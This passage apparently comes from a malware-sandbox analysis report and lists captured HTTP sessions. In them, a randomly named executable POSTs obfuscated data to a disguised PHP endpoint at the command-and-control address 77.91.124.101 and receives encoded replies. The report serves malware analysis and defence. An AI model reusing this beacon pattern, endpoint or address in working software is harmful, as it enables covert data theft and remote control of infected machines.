                                                            Data Ascii: "1 !#?V<)=S9( >1=43)9R=?0X3:7 5#)!Z&Z!+,).+ \&(3Q#0$ W/?=^-;>1*#=#_'S!( 95Q$^7$'.3&+!( 1$U0\7S&_+(:&T*+H6ZP
                                                            Nov 21, 2023 04:47:26.782782078 CET144OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:26.982301950 CET147INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:26.982625008 CET149OUTData Raw: 57 5b 5d 5e 5b 52 5f 5a 5d 57 55 57 55 5b 57 55 50 58 58 43 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[]^[R_Z]WUWU[WUPXXCV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=5(+%?07;Z4:!^?U*'>"W30U,8)(?,&G''^)3
                                                            Nov 21, 2023 04:47:27.184570074 CET149INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 58 26 01 20 1f 34 23 01 1e 2b 04 0f 50 39 3e 3e 06 3c 0d 25 5b 26 2d 30 5e 30 3a 3d 16 3f 3f 33 03 30 3a 2c 56 37 18 30 10 2a 1a 21 5a 0c 1d 26 5a 35 01 2f 56 2b 2e 0d 04 2b 5b 20 5e 27 22 20 06 2b 10 28 0b 23 0d 23 1f 25 55 38 57 2f 2c 2e 02 2d 3b 22 42 32 2c 00 5f 20 2d 23 5f 0c 14 27 1a 35 57 3b 59 23 20 07 09 23 24 38 15 20 0a 33 1c 27 3d 2c 1d 27 2b 32 04 3f 28 24 53 26 37 3c 55 33 03 20 0d 25 5f 3f 54 29 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "X& 4#+P9>><%[&-0^0:=??30:,V70*!Z&Z5/V+.+[ ^'" +(##%U8W/,.-;"B2,_ -#_'5W;Y# #$8 3'=,'+2?($S&7<U3 %_?T)*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.54971277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:24.543304920 CET139OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:24.740185022 CET139INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:24.741302967 CET140OUTData Raw: 00 0b 04 0c 03 0d 01 07 05 06 02 01 02 03 01 01 00 05 05 0e 02 07 03 0d 00 52 0f 00 03 0f 01 03 0f 02 04 09 01 07 03 05 0b 07 05 04 06 07 04 01 05 05 0c 0e 0f 53 05 52 01 02 04 56 04 55 05 0f 00 04 0f 5c 07 04 01 08 0c 50 0c 54 0a 0d 0f 00 04 04
                                                            Data Ascii: RSRVU\PTRQU\L~hNPvqv]aKt|f_`RxM`c_llcHxYa[hSwQwwZiO~V@xSn}Le
                                                            Nov 21, 2023 04:47:25.036397934 CET140INData Raw: 64 79 0e 7d 59 7a 63 71 5b 46 5b 69 00 67 41 53 75 40 09 63 04 5e 46 6a 04 7e 43 56 64 06 09 55 5c 55 77 6a 60 03 5c 71 5c 57 5f 6c 58 01 44 68 62 06 41 69 6b 7c 4a 79 5e 56 5f 5a 06 70 43 51 61 5c 40 51 58 01 59 54 01 0c 04 57 64 0c 59 54 57 60
                                                            Data Ascii: dy}Yzcq[F[igASu@c^Fj~CVdU\Uwj`\q\W_lXDhbAik|Jy^V_ZpCQa\@QXYTWdYTW`uUg]|]X_`blZzp]ia@Z}c^RoTkMVrXLboaUwEcg~}^bPUAofzBqZR_ZwE]bSISXD`njE\yoSkkypRh}]hDxkA|YW_P{J]d]FRZKQVTaejqe^}]xA|QN~NtzZ@]odEUqIk^FkdH
                                                            Nov 21, 2023 04:47:25.036421061 CET141INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:24 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 1340
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 56 4a 7d 5d 6c 54 68 5b 78 72 55 5c 7c 61 5a 5f 69 77 78 50 7f 63 69 4f 6d 4d 68 01 7d 72 52 48 63 63 79 4f 79 71 69 49 75 5f 60 00 7d 4b 78 01 55 4b 71 0c 76 72 5e 5b 7c 71 79 05 7c 49 5f 50 7b 76 7c 0a 6a 60 6b 04 61 5c 6d 4e 77 62 6e 5c 7c 5f 76 03 7d 55 60 40 7e 74 7b 4b 76 76 7b 06 7c 5c 54 5c 7c 73 72 5f 78 67 6b 5f 7b 01 70 4d 6f 6d 7c 5d 6d 62 74 05 7a 63 5c 41 7d 73 77 5f 6f 59 6f 59 69 5c 77 03 77 71 60 02 7a 51 41 5b 7c 67 77 53 7f 07 61 4e 76 7c 7c 41 7b 52 56 05 60 60 5c 40 7a 71 6d 05 7e 7f 7a 04 7b 4f 65 5b 77 60 67 4b 75 5f 67 5c 74 5f 76 50 7e 5d 79 5f 77 62 6d 01 76 66 74 09 68 55 75 01 77 6f 70 04 7f 60 7c 02 78 6f 78 5a 7a 60 66 03 6b 6d 6b 51 74 77 6f 5e 7e 61 72 09 7d 6d 73 08 6f 53 76 41 69 61 7d 07 7b 5d 46 51 68 6f 68 08 7f 63 7b 54 7d 59 7d 59 7b 7e 68 59 6c 71 7f 5b 6b 71 7f 07 7d 77 7c 50 7f 5e 57 0c 6e 73 5a 4f 6a 5c 70 01 74 63 71 51 7b 5c 79 4b 76 58 60 02 7e 48 78 04 7e 66 5f 40 77 62 6b 02 7d 62 79 42 7f 77 50 08 79 66 68 42 7d 73 7f 00 75 5c 5f 07 76 61 5b 4a 7c 71 58 01 7f 6c 74 0b 7f 77 67 4b 76 5f 73 04 7b 4c 7d 48 7d 4e 6d 06 7b 59 5a 07 78 59 60 01 78 7d 63 01 78 62 64 01 7b 5d 7e 04 7f 5e 74 4b 78 67 78 49 7d 72 73 05 75 61 7c 49 7e 52 7f 07 7f 59 70 0a 7f 61 5f 4e 76 7c 70 02 7a 7c 64 00 77 4e 62 0c 7b 71 5f 00 7d 42 6a 41 7a 61 76 48 76 4d 55 4b 75 5f 70 04 74 71 50 0a 7f 4e 50 40 77 62 71 4f 75 75 74 42 7f 6c 75 06 74 42 5e 42 7c 4d 70 44 79 7c 73 00 7a 70 72 44 7f 7d 5e 41 77 77 74 4e 7f 62 76 40 7d 7d 77 0d 78 53 5c 04 7e 72 57 07 7c 60 68 09 7c 42 5a 08 7d 4e 7c 08 7d 59 66 01 7b 6d 67 00 7b 5c 78 46 7c 5f 7b 00 7d 49 63 0c 7c 5e 79 0c 7a 63 78 00 7e 72 52 02 74 4d 7d 0c 79 61 7d 06 77 66 7c 4a 7c 76 68 02 7e 48 79 0c 74 4c 59 03 7c 5c 53 01 7c 67 72 0b 7b 76 74 40 7d 63 77 00 75 72 5f 4c 74 61 61 02 7c 4f 54 00 7e 6c 6c 40 7e 49 55 06 76 4f 77 04 7b 5c 53 02 7d 70 75 44 7b 59 60 4c 78 59 68 4d 79 6d 77 4b 79 62 52 01 7a 63 7e 03 7b 5d 4e 5a 78 59 6f 58 7d 72 60 5a 77 71 77 58 6a 0a 73 00 7d 64 63 51 7c 61 6d 0c 61 52 73 5d 6f 6f 60 04 60 60 54 40 7a 4f 76 5d 69 7c 7a 5f 7a 5c 79 05 5c 07 0f 7d 62 60 67 7b 5a 4c 7e 4a 78 59 76 4d 63 5c 72 59 62 5b 68 0a 7c 42 7a 5f 63 7c 7c 06 7e 63 6b 5a 7b 7c 7c 5b 78 4e 5f 5e 7f 7e 6f 52 74 67 70 02 7e 5b 7a 4f 7a 53 59 51 6f 0b 61 40 69 05 72 06 60 06 77 4c 68 60 5d 4e 62 73 49 54 7a 5a 40 5d 6f 7d 55 49 6f 61 78 03 68 61 63 07 6a 49 6c 55 7c 4e 79 4f 7a 63 6b 59 7d 62 6f 5a 77 73 6a 54 79 5f 5b 00 76 65 64 06 6a 00 64 5e 7f 5c 4b 51 63 04 64 45 51 71 48 04 68 01 5f 4c 6e 01 73 54 50 6f 64 5c 5b 05 69 5f 76 5c 71 04 7e 66 07 49 7e 7c 5e 4c 7d 67 55 46 76 5f 73 59 79 75 72 5e 69 63 01 44 54 7b 6f 5a 57 64 0c 53 6f 0b 5e 01 52 65 7c 07 7c 5c 7d 07 6b 06 51 5b 55 5e 63 49 57 75 7f 44 71 58 51 5c 51 0b 74 41 56 64 55 48 50 59 0d 40 62 6f 5d 46 57 0a 05 58 76 5d 7d 7a 50 62 7a 01 50 55 65 4c 51 72 58 58 74 74 7c 5d 62 62 0c 41 5b 7d 61 57 50 63 06 51 5a 5b 6e 5b 59 66 00 4d 60 0a 09 5e 63 6b 70 03 78 5c 70 5a 7a 7b 7c 5c 6f 63 0a 44 50 71 6f 57 58 64 0c 50 53 5b 61 56 52 6e 0f 4d 61 54 71 42 6a 65 79 01 7b 5f 7b 09 6b 0b 6f 40 6a 6c 7f 08 52 60 7e 47 7c 54 56 5f 54 05 73 42 55 62 56 43 51 5f 0f 52 53 07 66 4d 50 7f 73 00 61 04 0c 5a 63
                                                            Data Ascii: VJ}]lTh[xrU\|aZ_iwxPciOmMh}rRHccyOyqiIu_`}KxUKqvr^[|qy|I_P{v|j`ka\mNwbn\|_v}U`@~t{Kvv{|\T\|sr_xgk_{pMom|]mbtzc\A}sw_oYoYi\wwq`zQA[|gwSaNv||A{RV``\@zqm~z{Oe[w`gKu_g\t_vP~]y_wbmvfthUuwop`|xoxZz`fkmkQtwo^~ar}msoSvAia}{]FQhohc{T}Y}Y{~hYlq[kq}w|P^WnsZOj\ptcqQ{\yKvX`~Hx~f_@wbk}byBwPyfhB}su\_va[J|qXltwgKv_s{L}H}Nm{YZxY`x}cxbd{]~^tKxgxI}rsua|I~RYpa_Nv|pz|dwNb{q_}BjAzavHvMUKu_ptqPNP@wbqOuutBlutB^B|MpDy|szprD}^AwwtNbv@}}wxS\~rW|`h|BZ}N|}Yf{mg{\xF|_{}Ic|^yzcx~rRtM}ya}wf|J|vh~HytLY|\S|gr{vt@}cwur_Ltaa|OT~ll@~IUvOw{\S}puD{Y`LxYhMymwKybRzc~{]NZxYoX}r`ZwqwXjs}dcQ|amaRs]oo```T@zOv]i|z_z\y\}b`g{ZL~JxYvMc\rYb[h|Bz_c||~ckZ{||[xN_^~oRtgp~[zOzSYQoa@ir`wLh`]NbsITzZ@]o}UIoaxhacjIlU|NyOzckY}boZwsjTy_[vedjd^\KQcdEQqHh_LnsTPod\[i_v\q~fI~|^L}gUFv_sYyur^icDT{oZWdSo^Re||\}kQ[U^cIWuDqXQ\QtAVdUHPY@bo]FWXv]}zPbzPUeLQrXXtt|]bbA[}aWPcQZ[n[YfM`^ckpx\pZz{|\ocDPqoWXdPS[aVRnMaTqBjey{_{ko@jlR`~G|TV_TsBUbVCQ_RSfMPsaZc
                                                            Nov 21, 2023 04:47:26.359703064 CET142OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 384
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:26.558056116 CET143INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:26.558262110 CET143OUTData Raw: 57 50 58 51 5b 5b 5a 5d 5d 57 55 57 55 5c 57 5a 50 5f 58 43 56 57 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WPXQ[[Z]]WUWU\WZP_XCVWWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+>(.?0(8$.Z#95\+3=3$*T98*\<Y/>&G''^)/
                                                            Nov 21, 2023 04:47:26.762336969 CET144INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 11 31 11 20 10 21 23 3f 56 3c 29 3d 53 39 00 03 1a 28 20 3e 03 31 3d 34 12 33 29 39 52 3d 3f 30 58 33 3a 37 0c 20 35 23 04 29 1a 21 5a 0c 1d 26 5a 21 2b 2c 0f 29 2e 01 00 2b 04 20 5c 26 1f 0e 05 28 10 33 51 23 0a 30 01 24 20 20 57 2f 3f 3d 5e 2d 3b 3e 06 31 02 2a 1d 23 3d 23 5f 0c 14 27 53 21 1f 28 07 20 09 39 09 35 51 24 5e 37 24 09 1f 27 2e 33 0c 26 2b 21 17 28 06 20 1f 31 19 24 55 30 5c 37 53 26 5f 2b 1e 28 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "1 !#?V<)=S9( >1=43)9R=?0X3:7 5#)!Z&Z!+,).+ \&(3Q#0$ W/?=^-;>1*#=#_'S!( 95Q$^7$'.3&+!( 1$U0\7S&_+(:&T*+H6ZP
                                                            Nov 21, 2023 04:47:26.782782078 CET144OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:26.982301950 CET147INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:26.982625008 CET149OUTData Raw: 57 5b 5d 5e 5b 52 5f 5a 5d 57 55 57 55 5b 57 55 50 58 58 43 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[]^[R_Z]WUWU[WUPXXCV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=5(+%?07;Z4:!^?U*'>"W30U,8)(?,&G''^)3
                                                            Nov 21, 2023 04:47:27.184570074 CET149INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 58 26 01 20 1f 34 23 01 1e 2b 04 0f 50 39 3e 3e 06 3c 0d 25 5b 26 2d 30 5e 30 3a 3d 16 3f 3f 33 03 30 3a 2c 56 37 18 30 10 2a 1a 21 5a 0c 1d 26 5a 35 01 2f 56 2b 2e 0d 04 2b 5b 20 5e 27 22 20 06 2b 10 28 0b 23 0d 23 1f 25 55 38 57 2f 2c 2e 02 2d 3b 22 42 32 2c 00 5f 20 2d 23 5f 0c 14 27 1a 35 57 3b 59 23 20 07 09 23 24 38 15 20 0a 33 1c 27 3d 2c 1d 27 2b 32 04 3f 28 24 53 26 37 3c 55 33 03 20 0d 25 5f 3f 54 29 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "X& 4#+P9>><%[&-0^0:=??30:,V70*!Z&Z5/V+.+[ ^'" +(##%U8W/,.-;"B2,_ -#_'5W;Y# #$8 3'=,'+2?($S&7<U3 %_?T)*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            177.91.124.10180192.168.2.549713C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:26.683871984 CET144OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:26.881618023 CET145INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:26.881994009 CET147OUTData Raw: 57 5d 5d 5e 5e 5d 5a 50 5d 57 55 57 55 5a 57 52 50 59 58 48 56 50 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]]^^]ZP]WUWUZWRPYXHVPWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=((%=U#[.4) 9)^?3&=.'&T..]+< /.&G''^)7
                                                            Nov 21, 2023 04:47:27.085913897 CET149INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.54971377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:26.683871984 CET144OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:26.881618023 CET145INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:26.881994009 CET147OUTData Raw: 57 5d 5d 5e 5e 5d 5a 50 5d 57 55 57 55 5a 57 52 50 59 58 48 56 50 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]]^^]ZP]WUWUZWRPYXHVPWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=((%=U#[.4) 9)^?3&=.'&T..]+< /.&G''^)7
                                                            Nov 21, 2023 04:47:27.085913897 CET149INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10192.168.2.54972277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:32.493082047 CET179OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:32.690172911 CET181INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:32.690422058 CET183OUTData Raw: 57 51 58 5f 5e 5e 5a 5b 5d 57 55 57 55 5a 57 51 50 59 58 40 56 51 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQX_^^Z[]WUWUZWQPYX@VQW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(1<81*0+;7& )!?U='>P&3",8=+';&G''^)7
                                                            Nov 21, 2023 04:47:32.893771887 CET184INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:32 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1077.91.124.10180192.168.2.549722C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:32.493082047 CET179OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:32.690172911 CET181INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:32.690422058 CET183OUTData Raw: 57 51 58 5f 5e 5e 5a 5b 5d 57 55 57 55 5a 57 51 50 59 58 40 56 51 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQX_^^Z[]WUWUZWQPYX@VQW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(1<81*0+;7& )!?U='>P&3",8=+';&G''^)7
                                                            Nov 21, 2023 04:47:32.893771887 CET184INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:32 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10077.91.124.10180192.168.2.549815C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:34.131325960 CET559OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1396
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:34.329173088 CET560INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:34.329386950 CET561OUTData Raw: 57 59 58 5e 5b 5d 5f 59 5d 57 55 57 55 5e 57 55 50 5e 58 40 56 55 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYX^[]_Y]WUWU^WUP^X@VUWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*=X<!>34/$6]#)%_+U=&>:P309-%+ 8&G''^)?
                                                            Nov 21, 2023 04:48:34.532227993 CET564INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
